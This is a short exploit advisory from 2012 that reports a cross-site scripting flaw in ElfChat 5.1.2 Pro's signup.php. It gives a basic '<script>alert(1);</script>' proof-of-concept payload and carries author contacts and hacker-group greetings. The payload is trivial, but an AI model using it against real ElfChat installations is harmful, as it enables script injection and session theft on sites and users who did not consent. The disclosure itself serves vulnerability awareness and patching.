+---------------------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Elfet - ElfChat 5.1.2 Pro XSS [ x-x Cross Site Scripting] Vulnerable # Date : 2012-07-05 # Author : Avatar Fearless # Software link : http://community.elfchat.net/files/download/4-elfchat-5-demo/ # Official Site : http://elfchat.net/ # Version : 5.1.2 Pro # Tested on : Windows 7 Ultimate x32 # Original Advisory : http://thefear.in/elfchatvuln.txt || http://pastebin.com/0XCdGHzn # Contact : avatar@hiphopfan.com || avatar_legends@live.com/@mail.ru # Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/ # Greet`Z To : S3N4N +---------------------------------------------------------------------------------------------------------------------------------------------------+ [+] Vulnerable : http://site.tld/elfchat/signup.php [-] Exploit : It Takes JavaScript (ex. : <script>alert(1);</script>) [?] About : For More Info Contact me. [@] Respect To : All My Bro*S AA Team MF Team MKT Team [#] Special Thank`Z To : S3N4N , MaXToN +---------------------------------------------------------------------------------------------------------------------------------------------------